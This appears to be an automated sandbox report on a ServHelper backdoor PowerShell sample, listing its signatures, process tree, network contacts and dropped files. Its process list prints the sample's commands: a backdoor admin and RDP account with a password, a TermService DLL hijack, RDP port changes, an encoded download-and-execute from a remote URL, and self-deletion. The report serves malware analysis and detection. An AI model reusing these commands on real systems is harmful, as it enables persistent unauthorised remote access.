Malware Analysis Report

2024-10-23 17:53

Sample ID 210818-yv7s314s56
Target b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
SHA256 b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfacff1fd5d
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfacff1fd5d

Threat Level: Known bad

The file b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1 was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Blocklisted process makes network request

Sets DLL path for service in the registry

Possible privilege escalation attempt

Modifies RDP port number used by Windows

UPX packed file

Loads dropped DLL

Deletes itself

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Modifies data under HKEY_USERS

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Suspicious behavior: LoadsDriver

Modifies registry key

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-08-18 13:28

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-18 13:28

Reported

2021-08-18 13:33

Platform

win7v20210410

Max time kernel

123s

Max time network

86s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9afeeca9-f9d1-4549-b70a-7b8ebbdfb82e C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1e4a2880-eb41-4d2c-89ce-cdd9c1abcc64 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c018e57c-b040-47db-9360-e03c66e0ee9e C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RSDMQB1EMF4KCGCQMO7P.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6cb64870-33ce-450d-be1d-c4ca619df375 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a1d74f7-1ec3-4e45-af92-957665a0bee9 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c327661e-14f6-47b9-8ba4-e310b712f97d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_33ffc59f-3ddc-4673-b136-3c406752aba9 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dc45e851-387d-4910-82a3-f7a99b3bad26 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1d932505-2d6d-4598-8185-04b230f77765 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5cbeda8-7fcf-4a30-8f08-2c98775d931c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f433178-8b5a-42c6-af2e-e69d70de3792 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 102c45dd3594d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1116 wrote to memory of 588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1116 wrote to memory of 588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 588 wrote to memory of 388 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 588 wrote to memory of 388 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 588 wrote to memory of 388 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1116 wrote to memory of 528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1116 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1116 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 1116 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 1116 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 1312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 1312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 1312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1116 wrote to memory of 1860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1116 wrote to memory of 1860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1116 wrote to memory of 1860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1860 wrote to memory of 1936 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1860 wrote to memory of 1936 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1860 wrote to memory of 1936 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1116 wrote to memory of 1572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 1572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 1572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1840 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1840 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1920 wrote to memory of 2008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkor3f3f\bkor3f3f.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9FC.tmp" "c:\Users\Admin\AppData\Local\Temp\bkor3f3f\CSC214DF0007E2C4E6FBC15224A8234D3C.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc j5uA500A /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc j5uA500A /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc j5uA500A /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc j5uA500A

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc j5uA500A

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc j5uA500A

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 jfuag3.cn udp
N/A 8.8.8.8:53 jfuag3.cn udp
N/A 108.61.211.199:443 jfuag3.cn tcp

Files

memory/1116-60-0x000007FEFC181000-0x000007FEFC183000-memory.dmp

memory/1116-61-0x0000000002350000-0x0000000002351000-memory.dmp

memory/1116-62-0x000000001AB80000-0x000000001AB81000-memory.dmp

memory/1116-63-0x00000000024A0000-0x00000000024A1000-memory.dmp

memory/1116-64-0x0000000002860000-0x0000000002861000-memory.dmp

memory/1116-66-0x000000001AB04000-0x000000001AB06000-memory.dmp

memory/1116-65-0x000000001AB00000-0x000000001AB02000-memory.dmp

memory/1116-67-0x000000001C3E0000-0x000000001C3E1000-memory.dmp

memory/588-68-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\bkor3f3f\bkor3f3f.cmdline

MD5 47996150e199c0df5dccd4c340743e47
SHA1 8ea82ee6fd300fa6f8bc37558df03c81954908a6
SHA256 11abfe479c10c3466def648a9ccf227526a91cca593cec94ef3ae8293781ad1f
SHA512 1194ff681f3a363ccc8ceafef5339b4f76f4063e4c0fb4e2aba92253e7d01dd0c3ce2fba41cecba740476052268f4da53b3698b352c2d5f5907390cbdbd45a25

\??\c:\Users\Admin\AppData\Local\Temp\bkor3f3f\bkor3f3f.0.cs

MD5 fe552aa471e3747e57ddeff23d6da1fc
SHA1 16832293206ec339d47940533443f4fb375826fa
SHA256 60122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d
SHA512 8cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6

memory/388-71-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\bkor3f3f\CSC214DF0007E2C4E6FBC15224A8234D3C.TMP

MD5 d7957dec7e0d50bbb8dd18eb99597910
SHA1 92d7e7cabdba28066a22d8c97933cdbde408ed6d
SHA256 708dbba65cefd28cd68bc0949dc41ff4c8e5a93e3b98feb9c8fe04f2e54f7be1
SHA512 84b0c5843a92274c70cbe6eaa46e5d8e3fbd55b14fa13987ef31c079e7f0bed552d34a6d92eb0be1bcc6e707b2cf55d25d59ac1b2618ee60abfce054572aebd2

C:\Users\Admin\AppData\Local\Temp\RESB9FC.tmp

